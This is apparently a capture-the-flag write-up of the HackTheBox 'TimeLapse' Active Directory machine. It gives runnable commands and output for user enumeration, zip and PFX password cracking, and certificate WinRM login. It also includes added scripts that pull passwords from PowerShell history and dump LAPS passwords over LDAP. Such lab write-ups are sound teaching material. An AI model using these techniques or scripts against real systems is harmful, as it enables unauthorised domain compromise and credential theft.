TimeLapse

Easy Windows Active Directory Box on HackTheBox

Reconnaissance

As always we start with a full TCP port scan in Nmap to find the open ports and the services and versions behind them (-p- covers all 65535 ports, -Pn skips host discovery, -n skips reverse DNS and -sCV runs the default scripts plus version detection):

nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.152
# Nmap 7.95 scan initiated Tue Aug  5 11:39:01 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.046s latency).
Not shown: 65518 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-08-05 18:39:46Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn:
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-08-05T18:41:16+00:00; +7h59m59s from scanner time.
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49695/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time:
|   date: 2025-08-05T18:40:37
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  5 11:41:17 2025 -- 1 IP address (1 host up) scanned in 135.95 seconds

From the scan alone we can already tell we're facing a Domain Controller: DNS (53), Kerberos (88), MSRPC (135), LDAP and LDAPS (389/636), the Global Catalog (3268/3269) and SMB (445) all open on one host is the signature of a DC. A few other details are worth noting before we go further: the LDAP banner gives the domain name, timelapse.htb, and the certificate on port 5986 gives the DC's FQDN, dc01.timelapse.htb; port 5986 itself is WinRM over HTTPS (Microsoft-HTTPAPI/2.0 behind TLS), while plain WinRM on 5985 is not open; SMB signing is required, which rules out NTLM relay to SMB; and Nmap reports a clock skew of about 8 hours between us and the target. Kerberos tolerates only 5 minutes of skew, so if we end up authenticating with Kerberos tickets we'll have to sync our clock to the DC first (ntpdate or faketime).

The domain name is timelapse.htb, so we add it, together with the DC's FQDN dc01.timelapse.htb (from the certificate on 5986), to /etc/hosts pointing at 10.10.11.152.

As I always say when pentesting Active Directory, methodology matters most, so we enumerate as much as we can, starting with TCP port 53 (DNS). With dig we query the usual record types and attempt a zone transfer against the target:

dig @10.10.11.152 timelapse.htb NS
...
dig @10.10.11.152 timelapse.htb MX
...
dig @10.10.11.152 timelapse.htb TXT
...
dig @10.10.11.152 timelapse.htb AXFR
...

Nothing useful comes back from DNS, so we move on to port 88 (Kerberos) and try username enumeration with Kerbrute (https://github.com/ropnop/kerbrute) and a large username wordlist from SecLists:

kerbrute userenum --dc 10.10.11.152 -d timelapse.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 08/05/25 - Ronnie Flathers @ropnop

2025/08/05 12:33:19 >  Using KDC(s):
2025/08/05 12:33:19 >  	10.10.11.152:88

2025/08/05 12:33:22 >  [+] VALID USERNAME:	guest@timelapse.htb
2025/08/05 12:33:30 >  [+] VALID USERNAME:	administrator@timelapse.htb

Kerbrute sends one AS-REQ per candidate name: the KDC answers KDC_ERR_PREAUTH_REQUIRED for accounts that exist and KDC_ERR_C_PRINCIPAL_UNKNOWN for ones that don't, so no password is ever guessed and nothing gets locked out. We find two valid accounts, guest and administrator, but both are built-in and exist in every domain, so there is nothing domain-specific yet and we keep enumerating.

Next we try MS-RPC with rpcclient as guest with an empty password. Note that rpcclient reaches SAMR over an SMB named pipe, so this is really port 445 and not the endpoint mapper on 135:

rpcclient -U 'guest' 10.10.11.152
Password for [WORKGROUP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 

The guest account authenticates, but every SAMR query is denied, so we can't enumerate users or groups this way.

Next is TCP port 389 (LDAP), where we use ldapsearch with an anonymous bind (-x and no -D/-w) to see what an unauthenticated client can read:

ldapsearch -x -H ldap://10.10.11.152 -b "dc=timelapse,dc=htb"
# extended LDIF
#
# LDAPv3
# base <dc=timelapse,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

The DC refuses the anonymous query outright ("a successful bind must be completed"), so LDAP gives us nothing without credentials either. On to TCP port 445 (SMB) with NetExec (the maintained successor of CrackMapExec), again as guest with an empty password:

netexec smb 10.10.11.152 -u 'guest' -p '' --shares
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\guest: 
SMB         10.10.11.152    445    DC01             [*] Enumerated shares
SMB         10.10.11.152    445    DC01             Share           Permissions     Remark
SMB         10.10.11.152    445    DC01             -----           -----------     ------
SMB         10.10.11.152    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.152    445    DC01             C$                              Default share
SMB         10.10.11.152    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.152    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.152    445    DC01             Shares          READ            
SMB         10.10.11.152    445    DC01             SYSVOL                          Logon server share 

Most of these are the default shares, but Shares is custom and guest has READ on it, so let's see what's inside with smbclient:

smbclient -U 'guest' //10.10.11.152/Shares 

We pull down everything readable. The files that stand out are winrm_backup.zip and three .docx documents: LAPS_OperationsGuide.docx, LAPS_TechnicalSpecification.docx and LAPS_Datasheet.docx. Even before opening them, the names are a strong hint that LAPS is deployed in this domain, which will matter later.

After reading through the .docx files I found nothing useful in them, so let's move on to the zip.

Zip Password Cracking

The zip asks for a password. The entry name is visible without it (ZIP encrypts file contents, not the central directory, so legacyy_dev_auth.pfx shows up in the listing), and zip2john reports legacy PKZIP stream encryption (ZipCrypto), which john cracks very quickly. So we extract a hash with zip2john and run john against rockyou:

zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

john --wordlist=/usr/share/seclists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2025-08-05 12:47) 9.090g/s 31650Kp/s 31650Kc/s 31650KC/s swimfan09..sunmoontree
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

John cracks the password in under a second: supremelegacy. Let's unzip the file.

unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy 
  inflating: legacyy_dev_auth.pfx    

Inside is a single file, legacyy_dev_auth.pfx.

PFX Cracking

Some readers may ask: what is a PFX file?

A PFX file, also called a PKCS#12 file, is a password-protected container that bundles a certificate with its private key (and often the issuing chain). Given the archive name (winrm_backup) and the file name (legacyy_dev_auth), this is most likely a client-authentication certificate for the user legacyy, which WinRM on port 5986 can accept in place of a password.

The container has its own password, so we repeat the process with pfx2john and john. Note the cost line below: PKCS#12 uses a deliberately slow key derivation (2000 iterations here), so this runs at a few hundred thousand guesses per second rather than the tens of millions we saw for the zip:

pfx2john legacyy_dev_auth.pfx > hash2.txt

john --wordlist=/usr/share/seclists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:11 DONE (2025-08-05 12:53) 0.08389g/s 271463p/s 271463c/s 271463C/s thuglife03282006..thomasfelton
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Another password: thuglegacy. Now we split the PFX with openssl into its two parts: the first command writes only the client certificate, the second only the private key, unencrypted. If you are on OpenSSL 3.x and get an "unsupported" error, the bundle is using the old RC2/3DES ciphers and both commands need the -legacy flag:

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
Enter Import Password: thuglegacy

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem
Enter Import Password: thuglegacy
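
Before handing the certificate to Evil-WinRM it is worth checking what we actually extracted: whose certificate it is (the subject CN and the UPN in the subjectAltName) and whether its Extended Key Usage allows Client Authentication, since WinRM certificate mapping needs both. The script below is an added example, not part of the original write-up: it builds a throwaway PKCS#12 file with a constructed subject, UPN and EKU (the real certificate's contents are not reproduced here), runs the same two openssl pkcs12 commands non-interactively with the password john found, falls back to -legacy for OpenSSL 3, and prints the identity fields. It assumes openssl 1.1.1 or newer is installed.

```bash
#!/usr/bin/env bash
# Added example (not part of the original write-up): build a throwaway PKCS#12
# bundle shaped like legacyy_dev_auth.pfx, split it into certificate and key the
# same way the write-up does, and read the fields that tell us who the
# certificate belongs to and whether it may be used for client authentication.
# Assumptions: openssl (1.1.1 or 3.x) is on PATH. The subject, UPN and EKU below
# are constructed for the demo; they are not taken from the real certificate.
set -eu

WORK=$(mktemp -d)
PFX="$WORK/legacyy_dev_auth.pfx"
PFX_PASS='thuglegacy'          # the password john recovered from the real file

# Constructed stand-in for the PFX: a self-signed certificate for CN=legacyy
# with a UPN in the SAN and the Client Authentication EKU, the shape an
# AD CS "User" template certificate has.
make_sample_pfx() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 365 -subj '/CN=legacyy' \
        -addext 'subjectAltName=otherName:1.3.6.1.4.1.311.20.2.3;UTF8:legacyy@timelapse.htb' \
        -addext 'extendedKeyUsage=clientAuth' \
        -keyout "$WORK/sample.key" -out "$WORK/sample.crt" 2>/dev/null
    openssl pkcs12 -export -inkey "$WORK/sample.key" -in "$WORK/sample.crt" \
        -out "$PFX" -passout "pass:$PFX_PASS"
}

# The two openssl pkcs12 calls from the write-up, non-interactive. OpenSSL 3
# rejects bundles encrypted with the old RC2/3DES ciphers unless -legacy is
# given, so retry with it if the plain call fails. Returns 1 on a bad password.
pkcs12_extract() {
    local pfx=$1 pass=$2 outdir=$3 extra
    for extra in "" "-legacy"; do
        if openssl pkcs12 $extra -in "$pfx" -passin "pass:$pass" \
                -clcerts -nokeys -out "$outdir/cert.pem" 2>/dev/null &&
           openssl pkcs12 $extra -in "$pfx" -passin "pass:$pass" \
                -nocerts -nodes -out "$outdir/key.pem" 2>/dev/null; then
            return 0
        fi
    done
    return 1
}

# Identity checks on the extracted certificate.
cert_cn()  { openssl x509 -in "$1" -noout -subject | sed -n 's/.*CN *= *\([^,/]*\).*/\1/p'; }
cert_eku() { openssl x509 -in "$1" -noout -ext extendedKeyUsage | sed -n '2,$s/^ *//p'; }
# The UPN lives in an otherName SAN; OpenSSL 3 decodes it ("UPN::user@domain"),
# OpenSSL 1.1.1 only prints "othername:<unsupported>", so this is best effort.
cert_upn() { openssl x509 -in "$1" -noout -ext subjectAltName | grep -o '[^ :]*@[^ ,]*' || true; }

make_sample_pfx
pkcs12_extract "$PFX" "$PFX_PASS" "$WORK"
echo "subject CN : $(cert_cn "$WORK/cert.pem")"
echo "UPN        : $(cert_upn "$WORK/cert.pem")"
echo "EKU        : $(cert_eku "$WORK/cert.pem")"
```

The negative path matters too: pkcs12_extract returns 1 on a wrong password, so a script can tell a cracked password from a false positive before anything is uploaded or tried against the target.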

Now we have both halves. The certificate's subject names the user legacyy, so we try certificate authentication over WinRM with Evil-WinRM, passing the certificate (-c) and key (-k) and forcing TLS (-S), since only the HTTPS listener on 5986 is open:

evil-winrm -i 10.10.11.152 -u legacyy -c cert.pem -k key.pem -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> 

And we're in!

User pivoting

After some manual enumeration we find something useful in the PowerShell command-line history. PSReadLine writes every interactive command to ConsoleHost_history.txt in plaintext, per user, so it is always worth reading:

*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

That includes a valid credential: the user svc_deploy with the password E3R$Q62^12p7PLlC%KWaxuaV, which legacyy used to open a WinRM session to localhost, so WinRM is the obvious place to try it. Let's pivot to that user with evil-winrm as before, this time with a password instead of a certificate:

evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

And we have successfully pivoted to svc_deploy with nothing more than manual enumeration!
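
Reading the history by hand works on one box, but the pattern above (a plaintext literal turned into a SecureString and then wrapped in a PSCredential) is common enough to be worth a scripted check over every history file collected from a host: PSReadLine keeps one per user under AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, and Start-Transcript logs have the same problem. The script below is an added example and not part of the original write-up: it pairs each ConvertTo-SecureString literal with the PSCredential that consumes it and prints user:password. The sample history is constructed from the lines recovered above plus one invented double-quoted pair, and the script assumes only a POSIX shell with awk.

```bash
#!/usr/bin/env bash
# Added example (not part of the original write-up): pull credentials out of a
# PowerShell history file. PSReadLine appends every interactive command line to
# ConsoleHost_history.txt in plaintext, so a SecureString built from an
# -AsPlainText literal and then wrapped in a PSCredential hands us a ready-made
# username/password pair. Assumptions: a POSIX shell with awk; the sample
# history below is constructed from the lines the write-up recovered plus one
# invented pair in the double-quoted form.
set -eu

# awk program kept in a file so the quoting stays readable.
AWK_PROG=$(mktemp)
cat > "$AWK_PROG" <<'EOF'
# $p = ConvertTo-SecureString 'secret' -AsPlainText -Force   (or "secret")
# Remember the literal under the variable name it was assigned to.
match($0, /\$[A-Za-z_][A-Za-z0-9_]*[ \t]*=[ \t]*ConvertTo-SecureString[ \t]+['"][^'"]*['"]/) {
    s = substr($0, RSTART, RLENGTH)
    var = s; sub(/[ \t]*=.*/, "", var)
    pw = s;  sub(/.*ConvertTo-SecureString[ \t]+['"]/, "", pw); sub(/['"]$/, "", pw)
    secret[var] = pw
}
# $c = New-Object System.Management.Automation.PSCredential ('user', $p)
# Pair the username literal with the SecureString variable seen earlier.
match($0, /PSCredential[ \t]*\([ \t]*['"][^'"]*['"][ \t]*,[ \t]*\$[A-Za-z_][A-Za-z0-9_]*/) {
    s = substr($0, RSTART, RLENGTH)
    user = s; sub(/.*\([ \t]*['"]/, "", user); sub(/['"].*/, "", user)
    var = s;  sub(/.*,[ \t]*/, "", var)
    if (var in secret) print user ":" secret[var]
}
EOF

# Prints one "user:password" line per PSCredential whose SecureString variable
# was assigned from a quoted plaintext literal earlier in the same file.
extract_ps_creds() {
    awk -f "$AWK_PROG" "$1"
}

# Constructed sample: the write-up's recovered history, plus one invented pair
# (backup_svc / Winter2021!) to exercise the double-quoted, no-space form.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
$pw = ConvertTo-SecureString "Winter2021!" -AsPlainText -Force
$cred = New-Object PSCredential("timelapse\backup_svc", $pw)
exit
EOF

extract_ps_creds "$SAMPLE"
```

Run it against every ConsoleHost_history.txt you can read on the host; a literal that contains the quote character used around it is the one case the regex deliberately does not try to handle.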

Privilege Escalation — LAPS Abuse

After some manual enumeration as this user we find that it belongs to an unusual group, LAPS_Readers:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

so let's see whether we can abuse LAPS. First, a quick explanation of what it is:

LAPS (Local Administrator Password Solution) is Microsoft's mechanism for managing the local Administrator password of domain-joined computers: each machine periodically sets a unique random password on its local Administrator account and stores it on its own computer object in AD, in the attribute ms-Mcs-AdmPwd (the cleartext password) alongside ms-Mcs-AdmPwdExpirationTime. The attribute is marked confidential, so only principals granted the corresponding extended right on the OU (here, presumably, the members of LAPS_Readers) can read it. Domain controllers have no local accounts, so the password stored on DC01's computer object is in practice the password of the domain's built-in Administrator account, which is exactly what we log in with below.

We'll use the AdmPwd.PS PowerShell module (the LAPS client module, also mirrored on GitHub); to abuse LAPS this way we upload the whole module folder to the target. Uploading is not strictly necessary, though: the password is just an LDAP attribute on the computer object, so the Active Directory module already present on the DC (the history above shows get-aduser being run) can read it with Get-ADComputer and -Properties ms-Mcs-AdmPwd, and so can any LDAP client on our own machine bound as svc_deploy.

# Upload the folder and move to the target directory
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop> upload AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop> cd AdmPwd.PS
# Import the module
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop\AdmPwd.PS> Import-Module ./AdmPwd.PS.psd1

Now let's aim for DC01 and see whether we can retrieve its password:

*Evil-WinRM* PS C:\Users\svc_deploy\Desktop\AdmPwd.PS> get-admpwdpassword -computername dc01 | Select password

Password
--------
3H&)(xW48CNE68L9,0,bL0Wo

And we get a valid password: 3H&)(xW48CNE68L9,0,bL0Wo. It's worth checking ms-Mcs-AdmPwdExpirationTime as well, since LAPS rotates the password once it expires and a password read close to that time may stop working shortly after.
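
The AdmPwd.PS module is convenient but not required: ms-Mcs-AdmPwd is an ordinary (confidential) attribute on the computer object, so any LDAP client bound as svc_deploy can read it from the attacker's machine, and reading ms-Mcs-AdmPwdExpirationTime alongside it tells you whether the password is about to be rotated. The script below is an added example, not part of the original write-up or of the LAPS tooling: it shows the ldapsearch query (not run by default, since it needs the live DC), converts the FILETIME expiry, and parses the LDIF that comes back, including the two traps that bite people in practice, folded lines and base64-encoded (attr::) values. The LDIF sample is constructed: the DC01 password is the one recovered above, while both DNs, the WS01 entry and both expiry timestamps are invented. It assumes ldapsearch (OpenLDAP), awk and base64 are available.

```bash
#!/usr/bin/env bash
# Added example (not part of the original write-up): read the LAPS attributes
# straight over LDAP from the attacker's machine and make sense of the result,
# instead of uploading the AdmPwd.PS module to the target. Assumptions: an
# OpenLDAP ldapsearch client for the live query, awk and base64 for parsing.
# The LDIF sample below is constructed: the DC01 password is the one the
# write-up recovered; the DNs, the WS01 entry and both expiry values are invented.
set -eu

DC='10.10.11.152'
BASE='dc=timelapse,dc=htb'
BIND_USER='svc_deploy@timelapse.htb'

# Live query (not run by default): any account holding the "read ms-Mcs-AdmPwd"
# extended right gets the cleartext attribute back. Use -W instead of -w to be
# prompted rather than putting the bind password in the process list. Newer
# "Windows LAPS" stores a JSON blob in msLAPS-Password instead; add that
# attribute to the list if the domain uses it.
laps_query() {   # usage: laps_query '<bind password>' > laps.ldif
    ldapsearch -x -LLL -H "ldap://$DC" -D "$BIND_USER" -w "$1" -b "$BASE" \
        '(&(objectClass=computer)(ms-Mcs-AdmPwd=*))' \
        ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
}

# ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since
# 1601-01-01 UTC; 11644473600 s separate that epoch from the Unix one.
filetime_to_unix() { echo $(( $1 / 10000000 - 11644473600 )); }

# ldapsearch folds values longer than 76 columns onto continuation lines that
# start with a single space; join them back together and drop LDIF comments.
ldif_unfold() {
    awk '/^#/ { next }
         /^ /  { printf "%s", substr($0, 2); next }
         { if (started) printf "\n"; started = 1; printf "%s", $0 }
         END   { if (started) printf "\n" }'
}

# Prints one tab-separated line per computer: dn, password, expiry (unix time).
# Values ldapsearch cannot print safely (leading "<", ":" or space, trailing
# space, non-ASCII) come back as "attr:: <base64>" and must be decoded, or the
# pasted "password" will be the base64 text.
laps_from_ldif() {
    ldif_unfold < "$1" | {
        dn=; pw=; exp=
        while IFS= read -r line; do
            case "$line" in
                "dn: "*)
                    if [ -n "$dn" ]; then printf '%s\t%s\t%s\n' "$dn" "$pw" "$exp"; fi
                    dn=${line#dn: }; pw=; exp= ;;
                "ms-Mcs-AdmPwd:: "*)  pw=$(printf '%s' "${line#*:: }" | base64 -d) ;;
                "ms-Mcs-AdmPwd: "*)   pw=${line#*: } ;;
                "ms-Mcs-AdmPwdExpirationTime: "*) exp=$(filetime_to_unix "${line#*: }") ;;
            esac
        done
        if [ -n "$dn" ]; then printf '%s\t%s\t%s\n' "$dn" "$pw" "$exp"; fi
    }
}

# Constructed sample LDIF: a folded dn line and a base64-encoded password
# (it starts with "<", so ldapsearch would not print it raw).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: 3H&)(xW48CNE68L9,0,bL0Wo
ms-Mcs-AdmPwdExpirationTime: 132800000000000000

dn: CN=WS01,OU=Workstations,DC=timelapse,DC
 =htb
ms-Mcs-AdmPwd:: PHg5QEtwMyF6UQ==
ms-Mcs-AdmPwdExpirationTime: 132700000000000000

EOF

laps_from_ldif "$SAMPLE"
```

laps_query takes the bind password as its only argument and writes LDIF to stdout, which goes straight into laps_from_ldif; the constructed WS01 password starts with "<", a realistic LAPS character, and is exactly the case where pasting the raw ldapsearch line as the password would fail.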

Let's log in over WinRM as Administrator with it using Evil-WinRM:

evil-winrm -i 10.10.11.152 -u administrator -p '3H&)(xW48CNE68L9,0,bL0Wo' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And we're in as Administrator!!! Now we can grab the root flag and confirm that we pwned this box completely!!

Hope you found this write-up useful and see you next time!! <3
